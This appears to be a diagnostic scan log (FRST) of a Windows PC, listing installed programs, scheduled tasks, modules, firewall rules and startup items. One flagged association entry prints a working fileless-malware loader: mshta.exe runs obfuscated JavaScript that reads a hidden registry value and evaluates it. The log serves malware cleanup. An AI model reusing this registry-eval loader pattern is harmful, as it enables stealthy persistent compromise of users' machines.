War Thunder (HKLM-x32\...\Steam App 236390) (Version: - Gaijin Entertainment)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.176 - Zemana Ltd.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0A6FCFBF-96B1-40CB-97E3-794BCDC6F58D} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {0BCFA1A1-1EC5-4C87-9B57-941443E89977} - System32\Tasks\{7FD848FE-342B-446D-9D31-7734C94947D8} => pcalua.exe -a C:\Users\Nekut\Downloads\gtasa120cz\gtasa120cz.exe -d C:\Users\Nekut\Downloads\gtasa120cz
Task: {14D797F9-BB6D-4144-9C3D-88C2500CDCBF} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {196522D8-4BD8-4B31-9FB8-ACCC7A483E1C} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {325CB902-3891-4E6E-BA9D-28F802BC176F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {3A6CCA04-E5F4-4F90-A680-A9A5F23F824A} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-12-28] (COMODO)
Task: {49E243E0-ACAD-4373-A823-590D9DB02FB3} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {5A92D064-2115-424F-B351-9FC49340E33C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {6899F673-0F07-468E-91E7-4E56DB0619BD} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {6D5927DD-BEE1-4A03-B7E2-2F0A02CC0EAF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-26] (Adobe Systems Incorporated)
Task: {77FC23CE-5778-4997-86B6-0AF9DAB6C840} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {8018887D-23B5-49E9-8F6E-9CB31F63A62B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-23] (NVIDIA Corporation)
Task: {9C974213-F562-4CFD-9A9D-4D8A098C7FC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-03-14] (Microsoft Corporation)
Task: {A345A326-3A14-4A3E-94B7-67267B52B398} - System32\Tasks\COMODO\COMODO Maintenance {947247B5-026A-4437-9371-770782BE839D} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {A4444133-6A7C-4E6D-B090-92C841E301BC} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {AD71B9D6-2F01-49C5-B83B-76A1EA3B8567} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-11-15] (Piriform Ltd)
Task: {B0A7E0C4-9457-4CE3-848D-39E42D97A27E} - System32\Tasks\Process Lasso Core Engine Only => C:\Program Files\Process Lasso\processgovernor.exe [2016-05-14] (Bitsum LLC)
Task: {CD657602-AFE7-44B3-9A17-AEFCE46EFB45} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-02-23] (NVIDIA Corporation)
Task: {D8F861CA-EAE2-4146-859A-E6905C624F61} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-23] (NVIDIA Corporation)
Task: {DA40F702-D2CF-4F91-9255-A83784B68B66} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {DAAE4093-1005-4A30-B9A8-A828D3FF22D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {E47E59FE-19EC-43C8-B8ED-E60CA8049AF6} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EC723377-1EB3-4815-804B-63A20A982CCA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EF979201-DB6D-4829-A4FF-7E323A52458E} - System32\Tasks\Process Lasso Management Console (GUI) => C:\Program Files\Process Lasso\processlasso.exe [2016-05-14] (Bitsum LLC)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Nekut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-10-01 14:49 - 2017-02-23 19:35 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264528 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-28 00:17 - 2016-12-28 00:17 - 00155320 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdwrhlp.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00107704 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00179896 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2016-03-16 10:25 - 2016-03-16 10:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-27 18:02 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 18:57 - 2016-09-27 18:57 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 18:34 - 2017-03-04 07:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 18:35 - 2017-03-04 07:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-03-14 18:35 - 2017-03-04 07:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-03-13 16:26 - 2017-03-13 16:26 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\roottools.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00165376 _____ () C:\Program Files\Autodesk\Autodesk Sync\qjson_Ad_0.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00050176 _____ () C:\Program Files\Autodesk\Autodesk Sync\QtSolutions_MFCMigrationFramework_Ad_2.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00062464 _____ () C:\Program Files\Autodesk\Autodesk Sync\qoauth_Ad_1.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00932864 _____ () C:\Program Files\Autodesk\Autodesk Sync\qca_Ad_2.dll
2016-11-15 21:25 - 2016-11-15 21:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1029.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 01872384 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSEngine_OneCore.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-01 14:49 - 2017-02-23 19:34 - 65708992 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-01 14:49 - 2017-02-23 15:30 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-01 14:49 - 2017-02-23 15:30 - 02443320 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00385592 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00543288 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00468536 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-02 18:51 - 2013-09-23 18:52 - 00043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2016-12-02 18:51 - 2016-07-01 07:05 - 00285632 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\cs-CZ\AdWingManRes.dll
2016-12-02 18:51 - 2015-09-08 07:31 - 40640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00950272 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\.DEFAULT\Software\Classes\d313270: "C:\WINDOWS\system32\mshta.exe" "javascript:TW9QKQ5="M";W1H=new ActiveXObject("WScript.Shell");dyF0py="TdPGlWw";pLJ3D=W1H.RegRead("HKCU\\software\\evzi\\ivvn");grWNe4t7="hCDpe";eval(pLJ3D);Atr0SAD="gO8Gu";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 12:04 - 2017-03-15 21:01 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nekut\Downloads\20_15544_8b2ef1afed30ce1.jpg
DNS Servers: 192.168.1.20 - 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Steam"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2C739945-6CE6-401C-8A56-413B9047BC52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{CEC4E7E5-5CA4-4D2E-8536-AF3057B4112F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{C64359FC-D344-466D-81FC-4B5A7D613C8A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3A84145-F305-4467-80F6-E8F059E7B38C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{28BF43FB-6E17-4BC9-B664-FE60A3E1F795}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [TCP Query User{960FC5A6-B689-4D0C-8CB3-5B6B13E8A252}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [UDP Query User{70EA34E7-D380-4AA7-B630-E44F9EBDBF55}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{D9BE0F07-713A-4C7D-BBF5-69E6D3AA456C}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [{C932D19A-83C5-4E9A-8621-7FB1E16B9FE4}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{842EEF74-E01B-4251-B14F-AE52F479B695}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{4AAE633B-A344-46AA-A0FB-B65C5CA8EEC0}] => (Allow) LPort=35359
FirewallRules: [{E234A8A0-FC92-477F-8D96-BC8EA9736C02}] => (Allow) LPort=35359
FirewallRules: [UDP Query User{445AEBC2-7551-4859-BF7C-B7EFBA93C718}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [TCP Query User{D39FC987-5695-45D9-B471-72A6E8EDF82C}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [UDP Query User{1D4275C1-B96B-4321-BEDC-BDB9441F005F}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [TCP Query User{7D6632F2-6401-4B58-BD71-E308C0E2862C}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [{D6B0B055-BA21-42F9-AF82-8EB6B0671EDB}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B13B5683-96DA-40C9-853F-83D8F1E8311E}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6BC96264-0C0F-4DEE-AB7B-ED060088B268}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{55383924-F7BA-4E9A-93F9-3D4FBD194AF5}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{89C2649E-DA28-44E7-9C1C-710EB2B4F806}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{062BE7E7-2737-4786-8441-2C486848EA6A}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{EFE6DE3A-FFDF-4504-B2DF-F76E64C3F15A}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{23FAB33E-4807-42AA-AFA6-C67BD22A5BB0}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{6C19374D-7CAC-45A0-BE25-1EB2CFAC0480}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [UDP Query User{D9347118-9F09-415C-8677-2B4CA99BA2CE}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [TCP Query User{FAE0DFDF-A5DC-4765-A413-26A05ECF7B34}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{FF2639AC-4628-4B1F-A2B9-25BDE7E932D5}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{D73CD750-448A-4059-91CB-0D9901C5BD6B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0F4A6118-DBD6-40C8-9569-8EF064AD8433}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{B5279392-29B4-4ABE-AB30-85E6B994F9E9}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{15CE73A5-271D-44E2-9066-F9FAD9DF43DD}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [UDP Query User{33F8D17D-D01D-4B70-B3A7-699CA0960C4F}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [{B3390D60-A055-4799-8928-7985E45D5073}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{119C46D2-D69F-4916-93D0-A492D3018FA3}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{D2B8970F-A339-455F-9BF2-551BE7A0AF7A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A84C5F67-63EF-40CF-8097-67C4F89AA0FE}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [TCP Query User{F8FC7D3F-4200-47CB-95A3-7DF412DD1D9B}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{51EB5D95-5A2C-4F83-8850-D2946515AE58}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [{986167C5-E51F-4C37-BB35-97E62DEEBE01}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{7C3F5ED7-3192-42E0-8A9E-77E040E4AD9F}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{137FC7D5-30B5-4BBA-A710-8283E6609937}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{297E11F7-F88D-4C77-9C9E-55BD784FF74E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9CFB2900-ED4C-4409-80AD-6D01C922FF13}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C767A13B-406C-4B07-B639-7EADA888EA8F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0807AA42-C8B9-4D19-B4E5-DB8DB628D0C6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [TCP Query User{6834D14F-6071-4035-BD73-4DAAC949DDEF}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [UDP Query User{BAFB7D01-629D-446C-8553-FCC0E87B72C4}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [TCP Query User{1537CADF-6729-42B5-94CD-413F17548A1C}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [UDP Query User{D939E31F-AE2F-4685-909F-B6DAAB94D96E}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [TCP Query User{B44FE750-634B-4269-BB85-33B46F6758AD}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [UDP Query User{8664C386-999B-4BD2-9229-BEC8EC119384}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [TCP Query User{28811D0E-1839-44CC-917C-A453AA19F38F}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5072A21D-4055-4A7F-A331-95093DD4FC06}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{33263AE2-FE54-40B1-A6D2-2E75CD0F8ACC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F5F55D69-1237-4BF8-B325-8F0F8F18536C}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [UDP Query User{8EA80FD9-0C40-4D26-846A-114D98451260}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [{099E4F8C-7A71-4C04-8B64-B0AE458750F4}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
